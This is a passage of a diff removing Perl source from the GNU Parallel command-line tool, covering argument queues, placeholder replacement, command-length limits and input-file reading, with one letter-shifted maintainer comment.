-    }
-    return $record;
-}
-
-sub pop_all {
-    # Remove all arguments and zeros the length of replacement strings
-    # Returns:
-    #   all records
-    my $self = shift;
-    my @popped = @{$self->{'arg_list'}};
-    for my $replacement_string (keys %{$self->{'replacecount'}}) {
-	$self->{'len'}{$replacement_string} = 0;
-    }
-    $self->{'arg_list'} = [];
-    return @popped;
-}
-
-sub number_of_args {
-    # The number of records
-    # Returns:
-    #   number of records
-    my $self = shift;
-    # Ftq rudef oaawuq ime dqxqmeqp az 2011-01-24 mzp ime iaz nk MQhmd
-    # Mdzrvadp Nvmdymeaz az 2011-04-10. Ftue oaawuq dqxqmeqp az
-    # 2013-08-18 ue m nuf tmdpqd me kag tmhq fa geq daf14. Bxqmeq
-    # qymux oaawuq@fmzsq.pw itqz kag dqmp ftue.
-    #
-    # U my ftq ymuzfmuzqd ar m buqoq ar rdqq earfimdq omxxqp SZG
-    # Bmdmxxqx. Rdqq earfimdq sgmdmzfqqe kag mooqee fa ftq eagdoq
-    # oapq, ngf U tmhq nqqz iazpqduzs tai ymzk mofgmxxk _dqmp_ ftq
-    # eagdoq oapq.
-    #
-    # Fa fqef ftue U bgf uz m oayyqzf fqxxuzs bqabxq fa qymux yq itqz
-    # ftqk dqmp ftue. Ftq oayyqzf ime bgf uz m eqofuaz ar ftq oapq
-    # ftmf za azq iagxp xaaw fa ruj ad uybdahq ftq earfimdq - ea ftq
-    # eagdoq oapq qcguhmxqzf fa m pgefk oadzqd. Fa ymwq egdq ftq
-    # oayyqzf iagxp zaf etai gb ur eayq azq vgef sdqbbqp ftdagst ftq
-    # eagdoq oapq U daf13'qp ftq eagdoq oapq
-    # tffb://qz.iuwubqpum.ads/iuwu/DAF13
-    #
-    # 2.5 yazfte xmfqd U dqoquhqp mz qymux rday eayqazq ita zaf azxk
-    # ymzmsqp fa ruzp ftq oayyqzf, ngf mxea ymzmsqp fa sgqee ftq oapq
-    # tmp fa nq daf13'qp.
-    #
-    # Ftue nduzse yq fa ftq oazoxgeuaz ftmf ftqdq _mdq_ bqabxq, ita
-    # mdq zaf mrruxumfqp iuft ftq bdavqof, ftmf iuxx dqmp ftq eagdoq
-    # oapq - ftagst uf ymk zaf tmbbqz hqdk arfqz.
-    #
-    # This is really the number of records
-    return $#{$self->{'arg_list'}}+1;
-}
-
-sub number_of_recargs {
-    # The number of args in records
-    # Returns:
-    #   number of args records
-    my $self = shift;
-    my $sum = 0;
-    my $nrec = scalar @{$self->{'arg_list'}};
-    if($nrec) {
-	$sum = $nrec * (scalar @{$self->{'arg_list'}[0]});
-    }
-    return $sum;
-}
-
-sub args_as_string {
-    # Returns:
-    #  all unmodified arguments joined with ' ' (similar to {})
-    my $self = shift;
-    return (join " ", map { $_->orig() }
-	    map { @$_ } @{$self->{'arg_list'}});
-}
-
-sub args_as_dirname {
-    # Returns:
-    #  all unmodified arguments joined with '/' (similar to {})
-    #  \t \0 \\ and / are quoted as: \t \0 \\ \_
-    # If $Global::max_file_length: Keep subdirs < $Global::max_file_length
-    my $self = shift;
-    my @res = ();
-
-    for my $rec_ref (@{$self->{'arg_list'}}) {
-	# If headers are used, sort by them.
-	# Otherwise keep the order from the command line.
-	my @header_indexes_sorted = header_indexes_sorted($#$rec_ref+1);
-	for my $n (@header_indexes_sorted) {
-	    CORE::push(@res,
-		 $Global::input_source_header{$n},
-		 map { my $s = $_;
-		       #  \t \0 \\ and / are quoted as: \t \0 \\ \_
-		       $s =~ s/\\/\\\\/g;
-		       $s =~ s/\t/\\t/g;
-		       $s =~ s/\0/\\0/g;
-		       $s =~ s:/:\\_:g;
-		       if($Global::max_file_length) {
-			   # Keep each subdir shorter than the longest
-			   # allowed file name
-			   $s = substr($s,0,$Global::max_file_length);
-		       }
-		       $s; }
-		 $rec_ref->[$n-1]->orig());
-	}
-    }
-    return join "/", @res;
-}
-
-sub header_indexes_sorted {
-    # Sort headers first by number then by name.
-    # E.g.: 1a 1b 11a 11b
-    # Returns:
-    #  Indexes of %Global::input_source_header sorted
-    my $max_col = shift;
-
-    no warnings 'numeric';
-    for my $col (1 .. $max_col) {
-	# Make sure the header is defined. If it is not: use column number
-	if(not defined $Global::input_source_header{$col}) {
-	    $Global::input_source_header{$col} = $col;
-	}
-    }
-    my @header_indexes_sorted = sort {
-	# Sort headers numerically then asciibetically
-	$Global::input_source_header{$a} <=> $Global::input_source_header{$b}
-	or
-	    $Global::input_source_header{$a} cmp $Global::input_source_header{$b}
-    } 1 .. $max_col;
-    return @header_indexes_sorted;
-}
-
-sub len {
-    # Uses:
-    #   $opt::shellquote
-    # The length of the command line with args substituted
-    my $self = shift;
-    my $len = 0;
-    # Add length of the original command with no args
-    # Length of command w/ all replacement args removed
-    $len += $self->{'len'}{'noncontext'} + @{$self->{'command'}} -1;
-    ::debug("length", "noncontext + command: $len\n");
-    my $recargs = $self->number_of_recargs();
-    if($self->{'context_replace'}) {
-	# Context is duplicated for each arg
-	$len += $recargs * $self->{'len'}{'context'};
-	for my $replstring (keys %{$self->{'replacecount'}}) {
-	    # If the replacements string is more than once: mulitply its length
-	    $len += $self->{'len'}{$replstring} *
-		$self->{'replacecount'}{$replstring};
-	    ::debug("length", $replstring, " ", $self->{'len'}{$replstring}, "*",
-		    $self->{'replacecount'}{$replstring}, "\n");
-	}
-	# echo 11 22 33 44 55 66 77 88 99 1010
-	# echo 1 2 3 4 5 6 7 8 9 10 1 2 3 4 5 6 7 8 9 10
-	# 5 +  ctxgrp*arg
-	::debug("length", "Ctxgrp: ", $self->{'len'}{'contextgroups'},
-		" Groups: ", $self->{'len'}{'noncontextgroups'}, "\n");
-	# Add space between context groups
-	$len += ($recargs-1) * ($self->{'len'}{'contextgroups'});
-    } else {
-	# Each replacement string may occur several times
-	# Add the length for each time
-	$len += 1*$self->{'len'}{'context'};
-	::debug("length", "context+noncontext + command: $len\n");
-	for my $replstring (keys %{$self->{'replacecount'}}) {
-	    # (space between regargs + length of replacement)
-	    # * number this replacement is used
-	    $len += ($recargs -1 + $self->{'len'}{$replstring}) *
-		$self->{'replacecount'}{$replstring};
-	}
-    }
-    if($opt::nice) {
-	# Pessimistic length if --nice is set
-	# Worse than worst case: every char needs to be quoted with \
-	$len *= 2;
-    }
-    if($Global::quoting) {
-	# Pessimistic length if -q is set
-	# Worse than worst case: every char needs to be quoted with \
-	$len *= 2;
-    }
-    if($opt::shellquote) {
-	# Pessimistic length if --shellquote is set
-	# Worse than worst case: every char needs to be quoted with \ twice
-	$len *= 4;
-    }
-    # If we are using --env, add the prefix for that, too.
-    $len += $Global::envvarlen;
-
-    return $len;
-}
-
-sub replaced {
-    # Uses:
-    #   $Global::noquote
-    #   $Global::quoting
-    # Returns:
-    #   $replaced = command with place holders replaced and prepended
-    my $self = shift;
-    if(not defined $self->{'replaced'}) {
-	# Don't quote arguments if the input is the full command line
-	my $quote_arg = $Global::noquote ? 0 : not $Global::quoting;
-	$self->{'replaced'} = $self->replace_placeholders($self->{'command'},$Global::quoting,$quote_arg);
-	my $len = length $self->{'replaced'};
-	if ($len != $self->len()) {
-	    ::debug("length", $len, " != ", $self->len(), " ", $self->{'replaced'}, "\n");
-	} else {
-	    ::debug("length", $len, " == ", $self->len(), " ", $self->{'replaced'}, "\n");
-	}
-    }
-    return $self->{'replaced'};
-}
-
-sub replace_placeholders {
-    # Replace foo{}bar with fooargbar
-    # Input:
-    #   $targetref = command as shell words
-    #   $quote = should everything be quoted?
-    #   $quote_arg = should replaced arguments be quoted?
-    # Returns:
-    #   @target with placeholders replaced
-    my $self = shift;
-    my $targetref = shift;
-    my $quote = shift;
-    my $quote_arg = shift;
-    my $context_replace = $self->{'context_replace'};
-    my @target = @$targetref;
-    ::debug("replace", "Replace @target\n");
-    # -X = context replace
-    # maybe multiple input sources
-    # maybe --xapply
-    if(not @target) {
-	# @target is empty: Return empty array
-	return @target;
-    }
-    # Fish out the words that have replacement strings in them
-    my %word;
-    for (@target) {
-	my $tt = $_;
-	::debug("replace", "Target: $tt");
-	# a{1}b{}c{}d
-	# a{=1 $_=$_ =}b{= $_=$_ =}c{= $_=$_ =}d
-	# a\257<1 $_=$_ \257>b\257< $_=$_ \257>c\257< $_=$_ \257>d
-	#    A B C => aAbA B CcA B Cd
-	# -X A B C => aAbAcAd aAbBcBd aAbCcCd
-
-	if($context_replace) {
-	    while($tt =~ s/([^\s\257]*  # before {=
-                     (?:
-                      \257<       # {=
-                      [^\257]*?   # The perl expression
-                      \257>       # =}
-                      [^\s\257]*  # after =}
-                     )+)/ /x) {
-		# $1 = pre \257 perlexpr \257 post
-		$word{"$1"} ||= 1;
-	    }
-	} else {
-	    while($tt =~ s/( (?: \257<([^\257]*?)\257>) )//x) {
-		# $f = \257 perlexpr \257
-		$word{$1} ||= 1;
-	    }
-	}
-    }
-    my @word = keys %word;
-
-    my %replace;
-    my @arg;
-    for my $record (@{$self->{'arg_list'}}) {
-	# $self->{'arg_list'} = [ [Arg11, Arg12], [Arg21, Arg22], [Arg31, Arg32] ]
-	# Merge arg-objects from records into @arg for easy access
-	CORE::push @arg, @$record;
-    }
-    # Add one arg if empty to allow {#} and {%} to be computed only once
-    if(not @arg) { @arg = (Arg->new("")); }
-    # Number of arguments - used for positional arguments
-    my $n = $#_+1;
-
-    # This is actually a CommandLine-object,
-    # but it looks nice to be able to say {= $job->slot() =}
-    my $job = $self;
-    for my $word (@word) {
-	# word = AB \257< perlexpr \257> CD \257< perlexpr \257> EF
-	my $w = $word;
-	::debug("replace", "Replacing in $w\n");
-
-	# Replace positional arguments
-	$w =~ s< ([^\s\257]*)  # before {=
-                 \257<         # {=
-                 (-?\d+)       # Position (eg. -2 or 3)
-                 ([^\257]*?)   # The perl expression
-                 \257>         # =}
-                 ([^\s\257]*)  # after =}
-               >
-	   { $1. # Context (pre)
-		 (
-		 $arg[$2 > 0 ? $2-1 : $n+$2] ? # If defined: replace
-		 $arg[$2 > 0 ? $2-1 : $n+$2]->replace($3,$quote_arg,$self)
-		 : "")
-		 .$4 }egx;# Context (post)
-	::debug("replace", "Positional replaced $word with: $w\n");
-
-	if($w !~ /\257/) {
-	    # No more replacement strings in $w: No need to do more
-	    if($quote) {
-		CORE::push(@{$replace{::shell_quote($word)}}, $w);
-	    } else {
-		CORE::push(@{$replace{$word}}, $w);
-	    }
-	    next;
-	}
-	# for each arg:
-	#   compute replacement for each string
-	#   replace replacement strings with replacement in the word value
-	#   push to replace word value
-	::debug("replace", "Positional done: $w\n");
-	for my $arg (@arg) {
-	    my $val = $w;
-	    my $number_of_replacements = 0;
-	    for my $perlexpr (keys %{$self->{'replacecount'}}) {
-		# Replace {= perl expr =} with value for each arg
-		$number_of_replacements +=
-		    $val =~ s{\257<\Q$perlexpr\E\257>}
-		{$arg ? $arg->replace($perlexpr,$quote_arg,$self) : ""}eg;
-	    }
-	    my $ww = $word;
-	    if($quote) {
-		$ww = ::shell_quote_scalar($word);
-		$val = ::shell_quote_scalar($val);
-	    }
-	    if($number_of_replacements) {
-		CORE::push(@{$replace{$ww}}, $val);
-	    }
-	}
-    }
-
-    if($quote) {
-	@target = ::shell_quote(@target);
-    }
-    # ::debug("replace", "%replace=",::my_dump(%replace),"\n");
-    if(%replace) {
-	# Substitute the replace strings with the replacement values
-	# Must be sorted by length if a short word is a substring of a long word
-	my $regexp = join('|', map { my $s = $_; $s =~ s/(\W)/\\$1/g; $s }
-			  sort { length $b <=> length $a } keys %replace);
-	for(@target) {
-	    s/($regexp)/join(" ",@{$replace{$1}})/ge;
-	}
-    }
-    ::debug("replace", "Return @target\n");
-    return wantarray ? @target : "@target";
-}
-
-
-package CommandLineQueue;
-
-sub new {
-    my $class = shift;
-    my $commandref = shift;
-    my $read_from = shift;
-    my $context_replace = shift;
-    my $max_number_of_args = shift;
-    my $return_files = shift;
-    my @unget = ();
-    my ($count,%replacecount,$posrpl,$perlexpr,%len);
-    my @command = @$commandref;
-    # If the first command start with '-' it is probably an option
-    if($command[0] =~ /^\s*(-\S+)/) {
-	# Is this really a command in $PATH starting with '-'?
-	my $cmd = $1;
-	if(not ::which($cmd)) {
-	    ::error("Command ($cmd) starts with '-'. Is this a wrong option?\n");
-	    ::wait_and_exit(255);
-	}
-    }
-    # Replace replacement strings with {= perl expr =}
-    # Protect matching inside {= perl expr =}
-    # by replacing {= and =} with \257< and \257>
-    for(@command) {
-	if(/\257/) {
-	    ::error("Command cannot contain the character \257. Use a function for that.\n");
-	    ::wait_and_exit(255);
-	}
-	s/\Q$Global::parensleft\E(.*?)\Q$Global::parensright\E/\257<$1\257>/gx;
-    }
-    for my $rpl (keys %Global::rpl) {
-	# Replace the short hand string with the {= perl expr =} in $command and $opt::tagstring
-	# Avoid replacing inside existing {= perl expr =}
-	for(@command,@Global::ret_files) {
-	    while(s/((^|\257>)[^\257]*?) # Don't replace after \257 unless \257>
-                  \Q$rpl\E/$1\257<$Global::rpl{$rpl}\257>/xg) {
-	    }
-	}
-	if(defined $opt::tagstring) {
-	    for($opt::tagstring) {
-		while(s/((^|\257>)[^\257]*?) # Don't replace after \257 unless \257>
-                      \Q$rpl\E/$1\257<$Global::rpl{$rpl}\257>/x) {}
-	    }
-	}
-	# Do the same for the positional replacement strings
-	# A bit harder as we have to put in the position number
-	$posrpl = $rpl;
-	if($posrpl =~ s/^\{//) {
-	    # Only do this if the shorthand start with {
-	    for(@command,@Global::ret_files) {
-		s/\{(-?\d+)\Q$posrpl\E/\257<$1 $Global::rpl{$rpl}\257>/g;
-	    }
-	    if(defined $opt::tagstring) {
-		$opt::tagstring =~ s/\{(-?\d+)\Q$posrpl\E/\257<$1 $perlexpr\257>/g;
-	    }
-	}
-    }
-    my $sum = 0;
-    while($sum == 0) {
-	# Count how many times each replacement string is used
-	my @cmd = @command;
-	my $contextlen = 0;
-	my $noncontextlen = 0;
-	my $contextgroups = 0;
-	for my $c (@cmd) {
-	    while($c =~ s/ \257<([^\257]*?)\257> /\000/x) {
-		# %replacecount = { "perlexpr" => number of times seen }
-		# e.g { "$_++" => 2 }
-		$replacecount{$1} ++;
-		$sum++;
-	    }
-	    # Measure the length of the context around the {= perl expr =}
-	    # Use that {=...=} has been replaced with \000 above
-	    # So there is no need to deal with \257<
-	    while($c =~ s/ (\S*\000\S*) //x) {
-		my $w = $1;
-		$w =~ tr/\000//d; # Remove all \000's
-		$contextlen += length($w);
-		$contextgroups++;
-	    }
-	    # All {= perl expr =} have been removed: The rest is non-context
-	    $noncontextlen += length $c;
-	}
-	if($opt::tagstring) {
-	    my $t = $opt::tagstring;
-	    while($t =~ s/ \257<([^\257]*)\257> //x) {
-		# %replacecount = { "perlexpr" => number of times seen }
-		# e.g { "$_++" => 2 }
-		# But for tagstring we just need to mark it as seen
-		$replacecount{$1}||=1;
-	    }
-	}
-
-	$len{'context'} = 0+$contextlen;
-	$len{'noncontext'} = $noncontextlen;
-	$len{'contextgroups'} = $contextgroups;
-	$len{'noncontextgroups'} = @cmd-$contextgroups;
-	::debug("length", "@command Context: ", $len{'context'},
-		" Non: ", $len{'noncontext'}, " Ctxgrp: ", $len{'contextgroups'},
-		" NonCtxGrp: ", $len{'noncontextgroups'}, "\n");
-	if($sum == 0) {
-	    # Default command = {}
-	    # If not replacement string: append {}
-	    if(not @command) {
-		@command = ("\257<\257>");
-		$Global::noquote = 1;
-	    } elsif(($opt::pipe or $opt::pipepart)
-		    and not $opt::fifo and not $opt::cat) {
-		# With --pipe / --pipe-part you can have no replacement
-		last;
-	    } else {
-		# Append {} to the command if there are no {...}'s and no {=...=}
-		push @command, ("\257<\257>");
-	    }
-	}
-    }
-
-    return bless {
-	'unget' => \@unget,
-	'command' => \@command,
-	'replacecount' => \%replacecount,
-	'arg_queue' => RecordQueue->new($read_from,$opt::colsep),
-	'context_replace' => $context_replace,
-	'len' => \%len,
-	'max_number_of_args' => $max_number_of_args,
-	'size' => undef,
-	'return_files' => $return_files,
-	'seq' => 1,
-    }, ref($class) || $class;
-}
-
-sub get {
-    my $self = shift;
-    if(@{$self->{'unget'}}) {
-	my $cmd_line = shift @{$self->{'unget'}};
-	return ($cmd_line);
-    } else {
-	my $cmd_line;
-	$cmd_line = CommandLine->new($self->seq(),
-				     $self->{'command'},
-				     $self->{'arg_queue'},
-				     $self->{'context_replace'},
-				     $self->{'max_number_of_args'},
-				     $self->{'return_files'},
-				     $self->{'replacecount'},
-				     $self->{'len'},
-	    );
-	$cmd_line->populate();
-	::debug("init","cmd_line->number_of_args ",
-		$cmd_line->number_of_args(), "\n");
-	if($opt::pipe or $opt::pipepart) {
-	    if($cmd_line->replaced() eq "") {
-		# Empty command - pipe requires a command
-		::error("--pipe must have a command to pipe into (e.g. 'cat').\n");
-		::wait_and_exit(255);
-	    }
-	} else {
-	    if($cmd_line->number_of_args() == 0) {
-		# We did not get more args - maybe at EOF string?
-		return undef;
-	    } elsif($cmd_line->replaced() eq "") {
-		# Empty command - get the next instead
-		return $self->get();
-	    }
-	}
-	$self->set_seq($self->seq()+1);
-	return $cmd_line;
-    }
-}
-
-sub unget {
-    my $self = shift;
-    unshift @{$self->{'unget'}}, @_;
-}
-
-sub empty {
-    my $self = shift;
-    my $empty = (not @{$self->{'unget'}}) && $self->{'arg_queue'}->empty();
-    ::debug("run", "CommandLineQueue->empty $empty");
-    return $empty;
-}
-
-sub seq {
-    my $self = shift;
-    return $self->{'seq'};
-}
-
-sub set_seq {
-    my $self = shift;
-    $self->{'seq'} = shift;
-}
-
-sub quote_args {
-    my $self = shift;
-    # If there is not command emulate |bash
-    return $self->{'command'};
-}
-
-sub size {
-    my $self = shift;
-    if(not $self->{'size'}) {
-	my @all_lines = ();
-	while(not $self->{'arg_queue'}->empty()) {
-	    push @all_lines, CommandLine->new($self->{'command'},
-					      $self->{'arg_queue'},
-					      $self->{'context_replace'},
-					      $self->{'max_number_of_args'});
-	}
-	$self->{'size'} = @all_lines;
-	$self->unget(@all_lines);
-    }
-    return $self->{'size'};
-}
-
-
-package Limits::Command;
-
-# Maximal command line length (for -m and -X)
-sub max_length {
-    # Find the max_length of a command line and cache it
-    # Returns:
-    #   number of chars on the longest command line allowed
-    if(not $Limits::Command::line_max_len) {
-	# Disk cache of max command line length
-	my $len_cache = $ENV{'HOME'} . "/.parallel/tmp/linelen-" . ::hostname();
-	my $cached_limit;
-	if(-e $len_cache) {
-	    open(my $fh, "<", $len_cache) || ::die_bug("Cannot read $len_cache");
-	    $cached_limit = <$fh>;
-	    close $fh;
-	} else {
-	    $cached_limit = real_max_length();
-	    # If $HOME is write protected: Do not fail
-	    mkdir($ENV{'HOME'} . "/.parallel");
-	    mkdir($ENV{'HOME'} . "/.parallel/tmp");
-	    open(my $fh, ">", $len_cache);
-	    print $fh $cached_limit;
-	    close $fh;
-	}
-	$Limits::Command::line_max_len = $cached_limit;
-	if($opt::max_chars) {
-	    if($opt::max_chars <= $cached_limit) {
-		$Limits::Command::line_max_len = $opt::max_chars;
-	    } else {
-		::warning("Value for -s option ",
-			  "should be < $cached_limit.\n");
-	    }
-	}
-    }
-    return $Limits::Command::line_max_len;
-}
-
-sub real_max_length {
-    # Find the max_length of a command line
-    # Returns:
-    #   The maximal command line length
-    # Use an upper bound of 8 MB if the shell allows for for infinite long lengths
-    my $upper = 8_000_000;
-    my $len = 8;
-    do {
-	if($len > $upper) { return $len };
-	$len *= 16;
-    } while (is_acceptable_command_line_length($len));
-    # Then search for the actual max length between 0 and upper bound
-    return binary_find_max_length(int($len/16),$len);
-}
-
-sub binary_find_max_length {
-    # Given a lower and upper bound find the max_length of a command line
-    # Returns:
-    #   number of chars on the longest command line allowed
-    my ($lower, $upper) = (@_);
-    if($lower == $upper or $lower == $upper-1) { return $lower; }
-    my $middle = int (($upper-$lower)/2 + $lower);
-    ::debug("init", "Maxlen: $lower,$upper,$middle : ");
-    if (is_acceptable_command_line_length($middle)) {
-	return binary_find_max_length($middle,$upper);
-    } else {
-	return binary_find_max_length($lower,$middle);
-    }
-}
-
-sub is_acceptable_command_line_length {
-    # Test if a command line of this length can run
-    # Returns:
-    #   0 if the command line length is too long
-    #   1 otherwise
-    my $len = shift;
-
-    local *STDERR;
-    open (STDERR, ">", "/dev/null");
-    system "true "."x"x$len;
-    close STDERR;
-    ::debug("init", "$len=$? ");
-    return not $?;
-}
-
-
-package RecordQueue;
-
-sub new {
-    my $class = shift;
-    my $fhs = shift;
-    my $colsep = shift;
-    my @unget = ();
-    my $arg_sub_queue;
-    if($colsep) {
-	# Open one file with colsep
-	$arg_sub_queue = RecordColQueue->new($fhs);
-    } else {
-	# Open one or more files if multiple -a
-	$arg_sub_queue = MultifileQueue->new($fhs);
-    }
-    return bless {
-	'unget' => \@unget,
-	'arg_number' => 0,
-	'arg_sub_queue' => $arg_sub_queue,
-    }, ref($class) || $class;
-}
-
-sub get {
-    # Returns:
-    #   reference to array of Arg-objects
-    my $self = shift;
-    if(@{$self->{'unget'}}) {
-	$self->{'arg_number'}++;
-	return shift @{$self->{'unget'}};
-    }
-    my $ret = $self->{'arg_sub_queue'}->get();
-    if(defined $Global::max_number_of_args
-       and $Global::max_number_of_args == 0) {
-	::debug("run", "Read 1 but return 0 args\n");
-	return [Arg->new("")];
-    } else {
-	return $ret;
-    }
-}
-
-sub unget {
-    my $self = shift;
-    ::debug("run", "RecordQueue-unget '@_'\n");
-    $self->{'arg_number'} -= @_;
-    unshift @{$self->{'unget'}}, @_;
-}
-
-sub empty {
-    my $self = shift;
-    my $empty = not @{$self->{'unget'}};
-    $empty &&= $self->{'arg_sub_queue'}->empty();
-    ::debug("run", "RecordQueue->empty $empty");
-    return $empty;
-}
-
-sub arg_number {
-    my $self = shift;
-    return $self->{'arg_number'};
-}
-
-
-package RecordColQueue;
-
-sub new {
-    my $class = shift;
-    my $fhs = shift;
-    my @unget = ();
-    my $arg_sub_queue = MultifileQueue->new($fhs);
-    return bless {
-	'unget' => \@unget,
-	'arg_sub_queue' => $arg_sub_queue,
-    }, ref($class) || $class;
-}
-
-sub get {
-    # Returns:
-    #   reference to array of Arg-objects
-    my $self = shift;
-    if(@{$self->{'unget'}}) {
-	return shift @{$self->{'unget'}};
-    }
-    my $unget_ref=$self->{'unget'};
-    if($self->{'arg_sub_queue'}->empty()) {
-	return undef;
-    }
-    my $in_record = $self->{'arg_sub_queue'}->get();
-    if(defined $in_record) {
-	my @out_record = ();
-	for my $arg (@$in_record) {
-	    ::debug("run", "RecordColQueue::arg $arg\n");
-	    my $line = $arg->orig();
-	    ::debug("run", "line='$line'\n");
-	    if($line ne "") {
-		for my $s (split /$opt::colsep/o, $line, -1) {
-		    push @out_record, Arg->new($s);
-		}
-	    } else {
-		push @out_record, Arg->new("");
-	    }
-	}
-	return \@out_record;
-    } else {
-	return undef;
-    }
-}
-
-sub unget {
-    my $self = shift;
-    ::debug("run", "RecordColQueue-unget '@_'\n");
-    unshift @{$self->{'unget'}}, @_;
-}
-
-sub empty {
-    my $self = shift;
-    my $empty = (not @{$self->{'unget'}} and $self->{'arg_sub_queue'}->empty());
-    ::debug("run", "RecordColQueue->empty $empty");
-    return $empty;
-}
-
-
-package MultifileQueue;
-
-@Global::unget_argv=();
-
-sub new {
-    my $class = shift;
-    my $fhs = shift;
-    for my $fh (@$fhs) {
-	if(-t $fh) {
-	    ::warning("Input is read from the terminal. ".
-		      "Only experts do this on purpose. ".
-		      "Press CTRL-D to exit.\n");
-	}
-    }
-    return bless {
-	'unget' => \@Global::unget_argv,
-	'fhs' => $fhs,
-	'arg_matrix' => undef,
-    }, ref($class) || $class;
-}
-
-sub get {
-    my $self = shift;
-    if($opt::xapply) {
-	return $self->xapply_get();
-    } else {
-	return $self->nest_get();
-    }
-}
-
-sub unget {
-    my $self = shift;
-    ::debug("run", "MultifileQueue-unget '@_'\n");
-    unshift @{$self->{'unget'}}, @_;
-}
-
-sub empty {
-    my $self = shift;
-    my $empty = (not @Global::unget_argv
-		 and not @{$self->{'unget'}});
-    for my $fh (@{$self->{'fhs'}}) {
-	$empty &&= eof($fh);
-    }
-    ::debug("run", "MultifileQueue->empty $empty ");
-    return $empty;
-}
-
-sub xapply_get {
-    my $self = shift;
-    if(@{$self->{'unget'}}) {
-	return shift @{$self->{'unget'}};
-    }
-    my @record = ();
-    my $prepend = undef;
-    my $empty = 1;
-    for my $fh (@{$self->{'fhs'}}) {
-	my $arg = read_arg_from_fh($fh);
-	if(defined $arg) {
-	    # Record $arg for recycling at end of file
-	    push @{$self->{'arg_matrix'}{$fh}}, $arg;
-	    push @record, $arg;
-	    $empty = 0;
-	} else {
-	    ::debug("run", "EOA ");
-	    # End of file: Recycle arguments
-	    push @{$self->{'arg_matrix'}{$fh}}, shift @{$self->{'arg_matrix'}{$fh}};
-	    # return last @{$args->{'args'}{$fh}};
-	    push @record, @{$self->{'arg_matrix'}{$fh}}[-1];
-	}
-    }
-    if($empty) {
-	return undef;
-    } else {
-	return \@record;
-    }
-}
-
-sub nest_get {
-    my $self = shift;
-    if(@{$self->{'unget'}}) {
-	return shift @{$self->{'unget'}};
-    }
-    my @record = ();
-    my $prepend = undef;
-    my $empty = 1;
-    my $no_of_inputsources = $#{$self->{'fhs'}} + 1;
-    if(not $self->{'arg_matrix'}) {
-	# Initialize @arg_matrix with one arg from each file
-	# read one line from each file
-	my @first_arg_set;
-	my $all_empty = 1;
-	for (my $fhno = 0; $fhno < $no_of_inputsources ; $fhno++) {
-	    my $arg = read_arg_from_fh($self->{'fhs'}[$fhno]);
-	    if(defined $arg) {
-		$all_empty = 0;
-	    }
-	    $self->{'arg_matrix'}[$fhno][0] = $arg || Arg->new("");
-	    push @first_arg_set, $self->{'arg_matrix'}[$fhno][0];
-	}
-	if($all_empty) {
-	    # All filehandles were at eof or eof-string
-	    return undef;
-	}
-	return [@first_arg_set];
-    }
-
-    # Treat the case with one input source special.  For multiple
-    # input sources we need to remember all previously read values to
-    # generate all combinations. But for one input source we can
-    # forget the value after first use.
-    if($no_of_inputsources == 1) {
-	my $arg = read_arg_from_fh($self->{'fhs'}[0]);
-	if(defined($arg)) {
-	    return [$arg];
-	}
-	return undef;
-    }
-    for (my $fhno = $no_of_inputsources - 1; $fhno >= 0; $fhno--) {
-	if(eof($self->{'fhs'}[$fhno])) {
-	    next;
-	} else {
-	    # read one
-	    my $arg = read_arg_from_fh($self->{'fhs'}[$fhno]);
-	    defined($arg) || next; # If we just read an EOF string: Treat this as EOF
-	    my $len = $#{$self->{'arg_matrix'}[$fhno]} + 1;
-	    $self->{'arg_matrix'}[$fhno][$len] = $arg;
-	    # make all new combinations
-	    my @combarg = ();
-	    for (my $fhn = 0; $fhn < $no_of_inputsources; $fhn++) {
-		push @combarg, [0, $#{$self->{'arg_matrix'}[$fhn]}];
-	    }
-	    $combarg[$fhno] = [$len,$len]; # Find only combinations with this new entry
-	    # map combinations
-	    # [ 1, 3, 7 ], [ 2, 4, 1 ]
-	    # =>
-	    # [ m[0][1], m[1][3], m[3][7] ], [ m[0][2], m[1][4], m[2][1] ]
-	    my @mapped;
-	    for my $c (expand_combinations(@combarg)) {
-		my @a;
-		for my $n (0 .. $no_of_inputsources - 1 ) {
-		    push @a,  $self->{'arg_matrix'}[$n][$$c[$n]];
-		}
-		push @mapped, \@a;
-	    }
-	    # append the mapped to the ungotten arguments
-	    push @{$self->{'unget'}}, @mapped;
-	    # get the first
-	    return shift @{$self->{'unget'}};
-	}
-    }
-    # all are eof or at EOF string; return from the unget queue
-    return shift @{$self->{'unget'}};
-}
-
-sub read_arg_from_fh {
-    # Read one Arg from filehandle
-    # Returns:
-    #   Arg-object with one read line
-    #   undef if end of file
-    my $fh = shift;
-    my $prepend = undef;
-    my $arg;
-    do {{
-	# This makes 10% faster
-	if(not ($arg = <$fh>)) {
-	    if(defined $prepend) {
-		return Arg->new($prepend);
-	    } else {
-		return undef;
-	    }
-	}
-#	::debug("run", "read $arg\n");
-	# Remove delimiter
-	$arg =~ s:$/$::;
-	if($Global::end_of_file_string and
-	   $arg eq $Global::end_of_file_string) {
-	    # Ignore the rest of input file
-	    close $fh;
-	    ::debug("run", "EOF-string ($arg) met\n");
-	    if(defined $prepend) {
-		return Arg->new($prepend);
-	    } else {
-		return undef;
-	    }
-	}
-	if(defined $prepend) {
-	    $arg = $prepend.$arg; # For line continuation
-	    $prepend = undef; #undef;
-	}
-	if($Global::ignore_empty) {
-	    if($arg =~ /^\s*$/) {
-		redo; # Try the next line
-	    }
-	}
-	if($Global::max_lines) {
-	    if($arg =~ /\s$/) {
-		# Trailing space => continued on next line
-		$prepend = $arg;
-		redo;
-	    }
-	}
-    }} while (1 == 0); # Dummy loop {{}} for redo
-    if(defined $arg) {
-	return Arg->new($arg);
-    } else {
-	::die_bug("multiread arg undefined");
-    }
-}
-
-sub expand_combinations {
-    # Input:
-    #   ([xmin,xmax], [ymin,ymax], ...)
-    # Returns: ([x,y,...],[x,y,...])
-    # where xmin <= x <= xmax and ymin <= y <= ymax
-    my $minmax_ref = shift;
-    my $xmin = $$minmax_ref[0];
-    my $xmax = $$minmax_ref[1];
-    my @p;
-    if(@_) {
-	# If there are more columns: Compute those recursively
-	my @rest = expand_combinations(@_);
-	for(my $x = $xmin; $x <= $xmax; $x++) {
-	    push @p, map { [$x, @$_] } @rest;
-	}
-    } else {
-	for(my $x = $xmin; $x <= $xmax; $x++) {
-	    push @p, [$x];
-	}
-    }
-    return @p;
-}
-
-
-package Arg;
-
-sub new {
-    my $class = shift;
-    my $orig = shift;
-    my @hostgroups;
-    if($opt::hostgroups) {
-	if($orig =~ s:@(.+)::) {
-	    # We found hostgroups on the arg
-	    @hostgroups = split(/\+/, $1);
-	    if(not grep { defined $Global::hostgroups{$_} } @hostgroups) {
-		::warning("No such hostgroup (@hostgroups)\n");
